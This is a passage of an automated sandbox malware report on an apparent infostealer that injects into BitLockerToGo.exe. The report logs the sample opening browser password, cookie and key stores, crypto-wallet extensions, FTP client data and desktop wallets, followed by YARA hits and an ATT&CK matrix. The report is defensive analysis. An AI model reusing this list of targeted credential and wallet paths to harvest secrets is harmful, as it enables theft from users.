              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: Yara matchFile source: 00000001.00000003.1777410523.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1777480522.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7056, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: github_softwares_v1.18.exe, type: SAMPLE
              Source: Yara matchFile source: 00000000.00000000.1663970758.00007FF764F18000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1711084287.00007FF764F18000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: github_softwares_v1.18.exe PID: 6632, type: MEMORYSTR
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7056, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation
              1
              DLL Side-Loading
              311
              Process Injection
              1
              Masquerading
              2
              OS Credential Dumping
              111
              Security Software Discovery
              Remote Services1
              Screen Capture
              21
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              11
              Virtualization/Sandbox Evasion
              LSASS Memory11
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol1
              Archive Collected Data
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell
              Logon Script (Windows)Logon Script (Windows)311
              Process Injection
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin Shares4
              Data from Local System
              113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Deobfuscate/Decode Files or Information
              NTDS12
              System Information Discovery
              Distributed Component Object Model2
              Clipboard Data
              Protocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
              Obfuscated Files or Information
              LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc940%URL Reputationsafe
              https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg0%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
